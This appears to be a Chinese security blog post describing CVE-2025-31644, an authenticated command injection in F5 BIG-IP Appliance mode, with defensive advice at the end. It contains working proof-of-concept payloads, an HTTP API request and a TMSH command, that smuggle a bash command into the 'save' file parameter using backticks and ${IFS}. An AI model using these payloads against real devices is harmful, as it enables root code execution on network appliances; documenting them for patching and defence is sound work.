F5 BIG-IP rce漏洞 CVE-2025-31644

原创 棉花糖糖糖 棉花糖网安情报站 2025-05-15 08:22

F5 BIG-IP 系统漏洞 CVE-2025-31644

CVE-2025-31644 原理示意图

受影响版本
F5 BIG-IP v16.1.4.1

漏洞验证过程

漏洞详情

漏洞特征

• 编号
  : CVE-2025-31644

• 类型
  : 设备模式下的命令注入漏洞

• 风险
  : 管理员通过认证后可获得 root 权限远程代码执行

技术原理

在 Appliance 模式下，”save”指令的文件参数（file
）存在未过滤的 Perl 脚本和系统命令调用，攻击者可通过构造特殊字符（如反引号 “`）实现命令注入。该漏洞仅在 BIG-IP 设备启用 Appliance 模式时生效，此模式的安全机制本应阻止高级 shell 命令执行。

漏洞验证

API 接口payload

POST /mgmt/tm/sys/config HTTP/1.1
Host: target_host
Authorization: Basic [base64_credentials]
Content-Type: application/json

{
  "command": "save",
  "options": [
    {
      "file": "/var/tmp/`bash${IFS}-c${IFS}'id'|tee${IFS}mal_was_here.scf",
      "passphrase": "dummy"
    }
  ]
}

TMSH CLI payload

save sys config file /var/tmp/`bash${IFS}-c${IFS}'id'${IFS}'>&2'.scf no-passphrase

SSH 攻击验证截图

防御建议

1. 及时更新官方安全补丁

2. 严格控制管理接口访问权限

3. 在非必要情况下关闭 Appliance 模式

4. 启用多因素认证机制